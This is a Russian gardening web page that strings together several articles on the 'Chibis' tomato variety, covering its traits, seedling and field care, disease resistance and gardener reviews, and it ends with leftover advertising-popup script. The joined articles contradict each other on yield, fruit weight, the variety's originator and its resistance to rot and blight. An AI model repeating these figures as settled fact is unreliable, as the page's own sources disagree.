2 просмотров
Рейтинг статьи
1 звезда 2 звезды 3 звезды 4 звезды 5 звезд
Загрузка...

Описание томата чибис

Сортовая характеристика томата Чибис

Многие огородники уже оценили томат Чибис как отличный засолочный сорт с высокой урожайностью. В регионах с умеренным климатом его выращивают на грядках или под временным пленочным укрытием. Чтобы получить большое количество вкусных помидоров, полезно знать их характеристики, особенности и правила агротехники.

Сортовая характеристика томата Чибис

Краткая информация о сорте

  • Плоды и куст: помидоры ярко-красного цвета, продолговатой формы, весом от 50 до 90 г; куст детерминантный, высотой 60-80 см.
  • Урожайность: 1,5-3 кг с одного растения.
  • Устойчивость: к большинству заболеваний пасленовых – высокая, но может поражаться вершинной гнилью и фитофторой.
  • Применение: салаты, нарезки, консервирование, засолка, переработка, заморозка.
  • Распространение: рекомендован для выращивания в открытом грунте в регионах с умеренным климатом.
  • Посадка: рассадный метод; посев – в конце марта или начале апреля, пересадка – во второй половине мая; схема – 40×60 см.
  • Почва: легкая, рыхлая.
  • Уход: полив – каждые 10 дней, подкормки – раз в 2-3 недели, формирование – минимально, прореживание листьев и подвязывание – желательно.
  • Период созревания: среднеранний – плоды созревают через 90-105 суток после появления всходов. Хранятся помидоры достаточно долго.

Характеристика сорта

Срок созревания томатов Чибис среднеранний: плоды поспевают через 90-105 дней после формирования всходов). Помидорчики растут кистями по 6-10 штук.

Описание куста и плодов

Низкорослый куст детерминантного типа вырастает до 60-80 см. Облиственность и ветвистость растения средняя.

Помидоры среднего размера (50-90 г), продолговатой формы. Цвет ярко-красный. Вкус и аромат насыщенный томатный. Мякоть мясистая и в меру плотная, кожица достаточно крепкая, но не жесткая.

Область применения

По назначению томаты Чибис универсальны. Их используют для приготовления свежих салатов, бутербродов, горячих блюд (тушеных, запеченных и т.д.). Сорт считается идеальным для засолки и консервирования. Плотные помидорки можно замораживать в нарезанном виде или перерабатывать (делать из них густой кетчуп).

Урожайность

С одного кустика собирают 1,5-3 кг плодов. Для детерминантного низкорослого сорта это хорошая урожайность. Повысить этот показатель помогают регулярные подкормки и формирование кустов.

Устойчивость к болезням

По описанию огородников, томат почти не болеет мучнистой росой и табачной мозаикой, но может заражаться фитофторозом. При недостатке кальция возможно поражение вершинной гнилью. Из насекомых потенциальную опасность для него представляют белокрылка, тля, слизни, проволочник, паутинный клещ.

Регионы выращивания

Сорт помидоров Чибис рекомендован для выращивания в открытом грунте в средней полосе России (Центрально-Черноземный район, часть Восточно-Сибирского, Поволжье, северо-запад). Возможно культивирование на Урале (под пленочными укрытиями). В южных солнечных областях кусты советуют немного затенять.

Достоинства и недостатки

Плоды хорошо хранятся в свежем виде

К преимуществам томата Чибис относят:

  • универсальные в применении и вкусные плоды интересной формы;
  • хорошую урожайность (1,5-3 кг с низкорослого кустика);
  • компактность и неприхотливость растений;
  • отличную лежкость плодов;
  • удобную и беспроблемную транспортировку;
  • достаточно ранний срок созревания.

Среди недостатков сорта выделяют:

  • риск поражения фитофторой и вершинной гнилью;
  • в холодное лето плоды вырастают кисловатыми.

Татьяна Орлова (Василидченко) (канд. с.-х. наук):

Один из существенных недостатков сорта Чибис — сильно перегружается урожаем из-за чего плоды мельчают и по весу бывают существенно ниже заявленных 50-90 граммов.

Особенности выращивания

Посев на рассаду проводят в конце марта или в начале апреля. Обычно помидоры этого сорта выращивают в открытом грунте, поэтому пересадка выпадает на вторую половину мая или первые числа июня. (Необходимо, чтобы температура почвы достигла 15-16 °С.) При культивировании в теплице пересаживать растения можно на 2 недели раньше.

Посев

Для профилактики заболеваний посевной материал дезинфицируют (в марганцевом растворе, медном купоросе, борной кислоте или перекиси водорода). Почву готовят из садового грунта, торфа и покупной почвосмеси для выращивания рассады (все компоненты – в равных пропорциях).

Перед посевом землю также обеззараживают, прокаливая в духовке. Семена выкладывают в бороздки глубиной 1 см, присыпают землей, увлажняют из пульверизатора. Ящик накрывают стеклом или пленкой и ставят в теплое место.

Температурный режим: до появления ростков – 24-25 °С, после – 15-16 °С (в течение недели), далее – 20-22 °С

Уход за рассадой

Когда рассада томата Чибис проклюнется, с ящика нужно снять пленку и провести первый полив. В дальнейшем помидоры поливают раз в 10 дней, используя теплую отстоянную воду. На стадии формирования 2-3 настоящих листьев проводят пересаживание рассады в отдельные горшочки или более просторную емкость.

Татьяна Орлова (Василидченко) (канд. с.-х. наук):

После пикировки рассаду на несколько дней держат на рассеянном свете или даже слегка притеняют для укоренения. На яркое освещение выставляют, когда пересаженные растения хорошо укореняться.

За 2 недели до пересадки начинают процедуру закаливания: горшки выносят на улицу ежедневно, с каждым днем увеличивая время закалки.

Пересадка

Землю на грядке лучше удобрить навозом заранее – с осени. Непосредственно перед посадкой почву перекапывают, вносят золу, поливают раствором марганцовки, рыхлят. Лунки размещают по схеме 40×60 см, устанавливают колышки для подвязки.

Татьяна Орлова (Василидченко) (канд. с.-х. наук):

Готовят почву под овощные культуры и, в том числе, томат с осени. Эта подготовка состоит из внесения определенного количества органических и минеральных удобрений и перекопки почвы. Органические удобрения: 6-8 кг хорошо перепревшего навоза или компоста, минеральные по 80-100 г суперфосфата и калийной соли на квадратный метр . Удобрения разбрасывают по поверхности почвы и заделывают в нее во время перекопки.

В каждую ямку кладут щепотку суперфосфата и толченую яичную скорлупу, обильно поливают теплой водой. Высаженные растения окучивают и мульчируют.

Сорт нуждается в частичном формировании, чтобы помидоры получали достаточное количество света. Лишние пасынки обламывают, а листву прореживают (нижние листочки можно удалять, но постепенно).

Томат Чибис желательно подвязать к колышкам, чтобы плоды не оттягивали и не ломали ветви.

Поливают растения каждые 10 дней, через раз совмещая эту процедуру с подкормками. В качестве удобрений используют водорастворимые комплексы минеральных веществ, перепревший навоз, птичий помет, растительные настои.

После полива незамульчированную почву нужно рыхлить, чтобы на земле не образовывалась корка. Во избежание появления вредителей и болезней необходимо регулярно удалять сорняки.

Ошибки при выращивании

Прореживая листья томата Чибис, важно не переусердствовать, поскольку с их помощью происходит испарение жидкости. Если оборвать листву слишком сильно – влага уйдет в плоды, и они станут водянистыми, склонными к растрескиванию. Удалять листочки надо умеренно и постепенно (не больше 3 шт. за раз).

Схему посадки 40×50 можно использовать лишь в тех случаях, когда планируется формирование куста. По описаниям огородников, Чибис может вполне обходиться без этого, но тогда высаживать его нужно на более просторном участке (от этого напрямую зависят характеристики урожайности). Чтобы в будущем не пасынковать томаты, следует оставить расстояние между лунками в 55-60 см.

Отзывы огородников

По мнению большинства огородников, томат Чибис соответствует заявленному описанию. Помидоры небольшие, удлиненные, плотные и мясистые. Чаще всего их солят и консервируют, но также используют для салатов. Судя по отзывам, характеристики урожайности можно повысить формированием куста в 2 стебля.

Обычно плоды этого сорта созревают в первой половине июля. Многие огородники предпочитают срывать их в бланжевой спелости, а затем дают им дозреть дома. Так помидоры могут храниться более 2 месяцев. При транспортировке компактные и плотные «сливки» не повреждаются и не теряют товарного вида.

Описание томата Чибис

Огородники прежде всего обращают внимание на сорта, которые созревают за короткий промежуток времени и дают высокие показатели урожайности. Одним из таких является томат Чибис. Он не требует особого ухода, но обладает положительными характеристиками урожайности и вкуса.

Описание томата Чибис

Характеристика сорта

Томат Чибис вывели российские селекционеры компании Седек. Буквально несколько лет назад сорт томата Чибис внесли в Государственный реестр Российской Федерации. Специалисты высокие показатели всхожести и вкуса.

Томаты сорта Чибис универсальны для посадки. Фермеры выращивают его как в крытых помещениях типа теплицы, так и в открытом грунте. Главное — обращать внимание на климатические условия.

Описание куста

С момента образования первых всходов до сбора урожая проходит всего лишь 100 дней. Куст детерминантного типа, в высоту достигает 80 см.

Согласно описанию, листья томата сортаЧибис небольшого размера, темно-зеленого цвета, на поверхности каждого присутствуют бугорки и шероховатости.

Описание плода

Согласно описанию томатов сорта Чибис, его плоды имеют ярко-красный цвет. По форме они напоминают пальчики дамы, так как удлинены на концах. Кожура гладкая на ощупь, глянцевая. Вес каждого плода томата сорта Чибис составляет около 90 г.

Вкус помидора Чибис сладкий и не содержит кислоты. Внутри у него 3 камеры, наполненные небольшим количеством семян. Сухие вещества составляют около 5%.

Томаты сорта Чибис отличаются универсальностью в использовании: они подходят, как для салатов и свежего употребления, так и для консервации на зиму.

Преимущества и недостатки

Согласно описанию, томату описываемого сорта присущ ряд положительных характеристик:

  • урожайность: с 1 куста собирают около 5 кг отборных помидоров;
  • приятные вкусовые и товарные качества;
  • возможность транспортировки;
  • длительный срок хранения;
  • нетребовательность к уходу;
  • низкорослость;
  • стойкость ко всем разновидностям гнили;
  • высокая концентрация витаминов, аминокислот и других полезных веществ.

Единственным недостатком помидоров Чибис считается подверженность воздействию фитофторы.

Правила выращивания

Томаты следует выращивать рассадным способом

Чтобы вырастить хорошие растения, семена томата Чибис следует посадить для получения рассады, ведь не все они всходят при посадке в открытый грунт. Особенность в том, что семена сорта томатов Чибис не вырождаются, как у гибрида.

Тем, кто собирается проводить пасынкование, следует придерживаться специальной системы для посадки.

  • дистанция между рядами — 40 см;
  • между лунками — около 60 см.

Без пасынкования расстояние между лунками и рядами — 60 см. При высаживании необязательно искать идеальную почву: этот помидор прорастает в любой, даже если она не обладает высокими показателями плодородности.

Главными особенностями ухода являются следующие:

  • частое рыхление почвы;
  • регулярный, но нечастый полив;
  • регулярные подкормки.

Все эти мероприятия должны проводиться, чтобы корневая система получала достаточное количество воды и воздуха. В противном случае корневая система начнет гнить и растение умрет. Полив проводится только по мере осушения почвы и только теплой водой. Идеальнее всего использовать капельную систему орошения, ведь на листву не должна попадать влага.

Подкормки должны включать в себя исключительно минеральные удобрения. Первую подкормку должны проводить спустя 14 дней после посадки рассады. Для лучших показателей урожайности отдают предпочтение веществам, содержащим фосфор, калий или азот.

Заболевания и паразиты

Благодаря тому, что срок созревания плодов низкий, томаты Чибис не успевают подвергаться большинству заболеваний. По этой же причине насекомые и паразиты не успевают негативно воздействовать на растение.

В качестве профилактики почву перед посадкой рекомендуется опрыскать раствором марганца или луковой шелухи. На помощь приходят такие препараты, как Фофатокс или Таббу.

Заключение

Сорт томатов Чибис — идеальный вариант для посадки в открытый грунт. Во-первых, они не требуют постоянного ухода. Во-вторых, обладают уникальными показателями вкусовых качеств и урожайности.

Томат Чибис: отзывы, фото

Далеко не все огородники могут отдавать уходу за томатами много времени. В этом случае выручает довольно многочисленная группа неприхотливых детерминантных сортов, не требующих формирования и пасынкования. Среди них – Томат Чибис, представленный на фото, отзывы тех, кто его сажал в большинстве своем положительные.

Этот томат просто незаменим для тех, кто делает много заготовок на зиму. Плотная мякоть позволяет готовить из него прекрасные маринованные томаты. При засоле в бочках он не трескается и отлично держит форму, давая продукт высокого качества.

Чтобы у огородников не оставалось никаких вопросов при выборе для посадки сорта томата Чибис, составим его полное описание и дадим подробную характеристику, но начнем с фото.

Характеристика и описание сорта

Сорт томата Чибис внесен в Госреестр селекционных достижений в 2007 г. Он рекомендован для выращивания во всех регионах нашей страны для открытого грунта. При выращивании в теплице урожай будет еще больше. Хорошо этот сорт томата растет также на Украине и в Молдавии. Оригинаторами сорта являются Агрофирма «Авторские семена» и Козак Владимир Иванович. В продаже встречаются семена производства агрофирм Аэлита и СеДек.

По срокам созревания томат Чибис относится к среднеранним – первые плоды можно попробовать уже через 90 дней. В неблагоприятное лето этот срок может затянуться до 110 дней. Куст у растения штамбовый, компактный с крепким стеблем. Вырастает не выше 80 см. Кисть у томата Чибис простая, в ней может быть от 5 до 10 томатов. Первая кисть закладывается под 6-7 листом, остальные – идут через 1-2 листа.

Характеристика плодов

  • Томаты у сорта Чибис некрупные – средний вес от 50 до 70 г.
  • Кожица и мякоть плотная с высоким содержанием сухих веществ – до 5,9%, цвет ее яркий, красный.
  • Вкус приятный, высокое содержание сахаров делает его сладковатым.
  • Аромат как у настоящего грунтового помидора – насыщенный томатный.
  • Форма плодов у томата Чибис немного удлиненная с едва заметным носиком и небольшими ребрами. Обычно такую форму томатов называют пальчиковой.
  • Семенных камер не больше 3, помидор Чибис очень мясистый.

Благодаря плотной кожице эти помидоры хорошо хранятся и перевозятся на большие расстояния без порчи продукта.

Урожайность производители заявляют разную, по отзывам любителей огородников, которые сажали сорт томата Чибис, при хорошем уходе вполне можно получить до 2 кг с одного кустика.

Описание сорта томата Чибис будет неполным, если не сказать о его неприхотливости, отличной адаптации к любым условиям выращивания и устойчивости к основным заболеваниям помидоров. Он крайне редко поражается вершинной гнилью и почти не болеет фитофторой.
Агротехника этого томата не отличается сложностью, но имеет свои особенности.

Выращивание и уход

Выращивание качественной рассады – одна из важнейших составляющих полноценного урожая помидоров.

Как вырастить рассаду

Семена томатов сорта Чибис продают несколько производителей. При покупке их обращайте внимание на репутацию продавца, отзывы о его товаре, время пребывания компании на рынке семенной продукции. Лучше всего покупать авторские семена. В таких пакетиках исключена пересортица, да и качество семенного материала будет выше. Купленные семена просматривают и выбирают для посадки только самые крупные и толстенькие.

Приобретенные семена томата обрабатывают от возможных возбудителей болезней, которые могут находиться на их поверхности. То же самое нужно сделать и с собственными семенами, даже если растения, с которых они собраны, не болели.

Можно обеззараживать семена томата Чибис традиционным раствором марганцовки с концентрацией в 1%. Выдерживать их в этом случае нужно не более 20 мин. Промывание проточной водой после протравливания – обязательная процедура. Хорошо зарекомендовала себя для этих целей и 2 или 3% перекись водорода. Растворять ее нужно в теплой воде, так, чтобы температура была около 40 градусов, а выдерживать семена не более 8 мин.

Следующий обязательный этап подготовки семян томата Чибис – замачивание в стимуляторе роста. Эта процедура ускорит появление всходов и даст росткам энергию для дальнейшего роста. В качестве стимуляторов подойдут эпин, циркон, иммуноцитофит. Можно воспользоваться и гуматами, картофельным соком либо соком алоэ. Замачивание проводят не дольше 18 часов. Чтобы дополнительно защитить будущие томаты сорта Чибис от таких вредоносных заболеваний, как гнили и фузариозное увядание, можно опудрить их перед посадкой порошком биопрепарата триходермин.

Если есть сомнения в качестве семенного материала, семена томата сорта Чибис можно прорастить. Делать это удобнее всего на ватных дисках. Их увлажняют и раскладывают на плоской тарелочке или на дне пластикового контейнера. Сверху помещают семена и прикрывают таким же увлажненным диском. Если процесс проращивания семян проводится на тарелке, ее помещают в полиэтиленовый мешок, пластиковый контейнер достаточно закрыть крышкой. Но в любом случае семена быстро прорастут только в теплом месте.

Как только покажутся корешки у большей части семян томата Чибис, можно приступать к посеву. Если семенного материала достаточно, высевают только проросшие семена – они дадут самые крупные и сильные всходы. Если дорого каждое семечко, можно высеять их все. В этом случае часть растений томата взойдет позже и будет немного слабее, что вполне можно поправить заботливым уходом.

Высаживают проростки в специально подготовленный грунт. Самый лучший результат дает смесь в равных частях из покупного грунта, перегноя или биогумуса и песка.

Сеют семена томата Чибис на глубину, составляющую примерно 2/3 диаметра семечка по схеме 2х2 см. Грунт должен быть увлажненным. Прорастают семена в тепле, хорошо для этого емкости с семенами накрыть полиэтиленовыми пакетами. Как только показались первые петельки всходов, емкость ставят на самое светлое место с невысокой, не выше 14 градусов, температурой. Через 3-4 дня ее повышают и поддерживают на уровне 20 градусов в дневное время и 17 – ночью. Очень важен правильный световой режим. При недостатке света рассаду томата Чибис досвечивают специальными фитолампами.

При появлении 2 настоящих листочков рассаду следует распикировать в отдельные емкости.

Распикированные томаты нуждаются в притенении от яркого света на несколько дней.

Дальнейший уход за рассадой помидоров Чибис состоит из умеренных поливов теплой отстоянной водой, которые раз в 10 дней совмещают с подкормками слабым раствором комплексного минерального удобрения с микроэлементами.

Томат сорта Чибис готов к высадке в возрасте 45 дней. Хорошая рассада имеет от 5 до 7 настоящих листьев и наметившуюся первую цветочную кисть. Чтобы рассада помидоров легко приспособилась к новым условиям при пересадке, ее нужно к ним приучать постепенно, т. е. закаливать. Начинают это делать за 2 недели до высадки: выносят на открытый воздух сначала на час, а затем время пребывания постепенно увеличивают. Если ночная температура не опускается ниже 14 градусов тепла, ее можно оставить ночевать на улице.

Высаживают томаты сорта Чибис тогда, когда почва прогреется до 15 градусов тепла. В более холодной почве корни растений не усваивают все питательные вещества. Посаженые помидоры затеняют от солнца на 3-4 дня. Лунки перед посадкой хорошо проливают водой с добавлением гумата – ч. ложка на ведро воды. Первую неделю после посадки томаты сорта Чибис не поливают, чтобы они хорошо наращивали всасывающие корни. Затем потребуется регулярный еженедельный полив теплой водой из расчета – 10 л на кв.м. оптимальное время для полива – за 3 часа до захода солнца. Во время цветения и формирования урожая томата сорта Чибис поливают уже 2 раза в неделю, соблюдая те же нормы.

Кормят томаты Чибис раз в декаду растворимым комплексным удобрением, увеличивая во время цветения и формирования урожая норму калия.

Томат Чибис неприхотлив и требует минимальной формировки. Обычно удаляют все пасынки, растущие под первой цветочной кистью. Если требуется получить ранний урожай, можно формировать кустик в один стебель, удаляя все пасынки, но большого урожая в этом случае не получить. Чтобы нижние кисти спели быстрее, куст требуется осветлить. Для этого после полного формирования плодовой кисти, удаляют все нижние листья под ней. Операцию следует проводить в несколько этапов, чтобы не ослаблять растение.

Подробнее о выращивании низкорослых томатов можно посмотреть на видео

Томат Чибис — стабильный урожай без особых хлопот

Какие томаты можно было назвать в честь задорной птички чибис? Конечно же, низкорослые, с некрупными плодами и неприхотливые в выращивании. Форма плодов у этого сорта вытянутая, перцевидная с острым носиком-клювиком. Некрупные и плотные помидорки отлично подходят для консервирования, бочковой засолки и приготовления в собственном соку.

История выращивания томата Чибис

С помидорами Чибис огородники знакомы уже более десяти лет. Сорт зарегистрирован в Госреестре в 2007 году с допуском к выращиванию во всех регионах страны. Заявку на государственные сортоиспытания подали совместено кандидат сельскохояйственных наук Козак В. И. и московская агрофирма «АС-селекция», которая специализируется на продаже авторских семян.

Чибис приобрёл славу одного из лучших томатов для цельноплодного консервирования. Он привлекает не только идеальными для засолки плодами, но и простой агротехникой. Кусты можно выращивать без пасынкования и подвязки, не опасаясь грибковых заболеваний.

Томаты Чибис прекрасно плодоносят без подвязки и пасынкования

На форумах некоторые огородники сравнивают Чибис с томатом Кибиц, который распространён на Украине. Действительно, сорта похожи, но есть и отличия, например, Кибиц более ранний, безрассадный, куст у него компактнее.

Томаты Кибиц и Чибис похожи, но некоторыми характеристиками, всё же, отличаются

Описание сорта и фото плодов

Семена Чибиса есть в свободной продаже под марками «Гавриш», «Седек», «Аэлита». Эти производители дают томату такое описание:

  • По сроку созревания среднеспелый и среднеранний, от появления всходов до поспевания первых плодов проходит 100–110 дней.
  • Куст невысокий, с ограниченным ростом, высотой 50–60 см.
  • Плоды удлинённые, цилиндрические, с носиком, ярко-красные, массой 50–70 г. Помидорки очень плотные, не растрескиваются, содержат много сухих веществ, имеют насыщенный томатный вкус.

Характерная черта Чибиса — острый носик на вершине плода

Заявленная «Гавришем» урожайность — 3 кг с куста, но для этого плоды нужно собирать бланжевыми и дозаривать дома.

Характеристики томата Чибис из Госреестра селекционных достижений (таблица)

Место выращивания открытый грунт и под плёночными укрытиями в личных хозяйствах
Назначение салатное и для цельноплодного консервирования
По сроку созревания среднеранний
Куст детерминантный
Лист зелёный, среднего размера
Соцветие простое
Плодоножка с сочленением
Плод цилиндрический, слаборебристый, плотный, в полной спелости красный
Число семенных камер 2–3
Масса одного плода 50–55 г
Вкус хороший
Урожайность 2,1 кг/м 2
Иммунитет к вершинной и корневой гнилям

Особенности выращивания

Семена томата Чибис сейте в последней декаде марта, крайний срок — начало апреля. В рассадный период уход стандартный: пикировка, поливы, подкормки и закалка перед высадкой на постоянное место. Рассаду в открытый грунт высаживайте в пору, когда пройдут все возвратные заморозки, а в теплицу и под временное укрытие — на 1–2 недели раньше.

Видео: подробно об уходе за томатной рассадой

Схема размещения томатов Чибис на грядке — 40х60 см. Уход заключается в обильных поливах раз в неделю при отсутствии дождей, рыхлениях и подкормках каждые 10–14 дней комплексными смесями для томатов. Кусты можно не подвязывать и не пасынковать. Помидоры Чибиса имеют плотную кожицу и, даже лежащие на земле, не повреждаются гнилями. Плодов при таком минимальном уходе будет много, но мелких — около 50 г.

Если есть время на формирование и подвязку, то можно вырастить томаты крупнее почти в 1,5 раза — по 70 г. Удаляйте все пасынки ниже первой кисти, остальные не трогайте, именно на них у низкорослых сортов формируется основной урожай. После такого частичного пасынкования, кусты, ранее опиравшиеся на нижние побеги, теряют устойчивость и заваливаются набок, поэтому их придётся ещё и обеспечить опорой.

Если частично удалить пасынки и подвязать кусты, то помидоры вырастут крупнее

Урожай Чибиса созревает в июле — августе. Спелые помидоры долго могут висеть на кустах, они не растрескиваются. Но если их собирать в начале окрашивания, то у куста появятся силы на образование новых завязей, плодов вы соберёте больше.

Думаю, что некрупные и плотные томаты Чибис отлично подойдут не только для салатов и консервирования, но и для подвяливания. Я режу такие помидорки на 2–3 дольки, ложкой очищаю от сока и семян, пересыпаю измельчённым чесноком или пряными травами и отправляю в сушилку. Подсохшие, но ещё гибкие ломтики храню в стеклянных банках, залив растительным маслом. Получается деликатес, который можно и просто так есть, и добавлять в разные блюда как пряность. Кстати, масло тоже напитывается ароматами и прекрасно дополняет любые салаты.

Отзывы тех, кто сажал этот сорт помидоров

Из пачки Чибиса выросли очень симпатичные помидорки, внешне похожи на маленькие перчики. Просто идеальны для консервирования в банки до литра. И в целом сорт понравился, высота кустов в парнике была 50–60 см, не пасынковался вообще, рос сам по себе в несколько стволов. Плодов много, вершинной гнили не было.

Nataly

http://www.tomat-pomidor.com/forums/topic/5653-%D1%87%D0%B8%D0%B1%D0%B8%D1%81/

У меня в этом году хороший урожай в открытом грунте дал только томат Чибис от фирмы Гавриш. Лето в этом году в подмосковье было очень сырым и холодным. Остальные сорта и гибриды в открытом грунте росли медленно. Томат Чибис сеяла в этом году первый раз. Очень понравился. Пасынковать не надо, скороспелый, устойчивый к неблагоприятным условиям. Плоды интересной вытянутой формы. Удобны для засолки. Уже сентябрь, а он еще зелененький. Завтра еще помидорки пойду снимать.

СветаС

http://www.forumdacha.ru/forum/viewtopic.php?t=3058&start=40

В этом году очень порадовал Чибис — был весь в помидориках))

lana208

http://forum.littleone.ru/showthread.php?t=7547768&page=457&pp=30

Томаты Чибис прекрасно растут в полевых условиях. Своей неприхотливостью привлекают фермеров и огородников, которым некогда заниматься пасынкованием и подвязкой. А если найдётся время на формирование кустов, то урожайность будет не только стабильной, но и более высокой.

Характеристика и описание сорта томата Чибис

Томат Чибис – это сорт томата, о котором можно услышать в последнее время большое количество положительных отзывов. Данный сорт является среднеранним и сбор урожая происходит через, примерно, 100 дней. В некоторых источниках данный сорт имеет иное название – «Кибиц». Отличается он от Чибиса страной происхождения (Кибиц из Польши, а Чибис и Российской Федерации). Имеет сладкий вкус с легкой кислинкой.

Описание внешнего вида

Внешне сами плоды выглядят овально-продолговатыми (некоторые данную форму называют «пальчик»), имеют ярко-красный цвет. Помидоры достаточно плотные и мясистые. Шкурка гладкая, прочная, имеет отблеск. Вес одного плода может достигать 90-100 граммов. Плоды на кусте располагаются близко друг к другу (растут гроздьями по 5-10 плодов на каждой ветке).

Куст высотой 70-80 сантиметров. Листья небольшого размера, темно-зеленого цвета. Стебли и плодоножка достаточно толстые.

Как выращивать помидор Чибис

Выращивание и уход за Чибисом не требует специфических знаний и навыков. Непритязательность данного сорта позволяет выращивать его в любых климатических условиях, кроме дальнего севера. Расти может на любой почве. Единственные действия, которые необходимы для качественного и быстрого роста – это разрыхленная почва, периодические поливания и прополка.

Также желательно в первые несколько дней после того, как куст пророс, обрывать нижние листья. В дополнительной опоре Чибис не нуждается, что также облегчает жизнь фермеру.

Схема посадки без пасынкования – 60 на 60, с пасынкованием – 60 на 40.

Важно! Если вы хотите получить больший урожай, то вам рекомендуется удобрить землю минеральными удобрениями через 2 недели после посадки. Также подойдут и другие удобрения, в случае если минеральными вы не запаслись, но эффект будет менее заметным.

Во избежание заболевания фитофторой, можно раз в месяц поливать куст раствором марганцовки.

Для большей урожайности следует начинать собирать плоды в момент, когда они окрашиваются в бурый цвет (в этот момент они еще не дозрели). Это значительно поспособствует количеству урожая, который вы соберете за один сезон. Дозревать сорванные плоды должны в теплом помещении.

Плюсы и минусы сорта Чибис

Данный сорт обладает большим количеством преимуществ по отношению к другим.

Главный его плюс – это очень высокая урожайность. Одна посадка, в среднем, позволяет собрать вплоть до 3 килограммов плодов, что является очень хорошим результатом.

Еще одним немаловажным преимуществом данного сорта, является его насыщенные вкус и запах, которые получаются благодаря тому, что расти они могут просто на грядке под открытым небом. Перепады температур днем и ночью также способствуют этому.

Для данного сорта характерна неприхотливость. Толстые стебли и невысокий рост куста, позволяют ему переживать многие невзгоды, а вам выращивать его вне парниковых условий.

Транспортировка созревших плодов также не вызовет никаких проблем. Благодаря своей толстой шкурке и в целом высокой плотности, томаты не будут деформироваться и повреждаться в процессе перевозки. Также немаловажным является тот факт, что храниться Чибис достаточно долго, и прекрасно подходит для различных видов консервирования.

Чибис богат многими полезными и питательными элементами: калий, марганец, магний, а также целым спектром витаминов группы B.

К большинству заболеваний данный сорт имеет устойчивость, но при этом статистка говорит нам, что Чибис имеет склонность к заболеванию фитофторой.

Отзывы

Очень многие владельцы огородов уже успели в полной мере убедится в тех качества, которыми славится Чибис. На просторах интернета можно найти отзывы многих людей. Так, например, одна женщина, которая живет неподалеку от Луганска, рассказывала о том, что выращивала помидоры Чибис на своем участке, и они оказались единственными, кто смог вырасти в условиях военных действий. По ее словам, она совершенно не следила за рассадой. И это не удивительно.

Также присутствуют отзывы фермеров, которые являются владельцами крупных фермерских хозяйств. Один из них поведал, что сажал за всю историю своей деятельности множество различных сортов, но только Чибис имеет показатели урожайности настолько хорошие. Еще им был упомянут тот факт, что эти помидоры разбирают быстрее всего, что очень наглядно говорит о вкусовых качествах.

Такая характеристика от людей, которые имели опыт рассады данного сорта, является положительным показателем, на который вам следует обратить свое внимание.

Заключение

В заключение можно сказать, что сорт помидоров Чибис – это прекрасный вариант для тех, кто не хочет тратить на посадку и уход большое количество времени, но при этом вырастить хороший урожай. Несмотря на то, что семена данного сорта появились на рынке относительно недавно, он успел получить признание среди тысяч огородников по всей России и во всех странах СНГ. Его неприхотливость, а также вкусовые качества, никого не оставят равнодушным.

Высаживая Чибис на свою грядку, вы можете быть абсолютно уверены в большом урожае.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
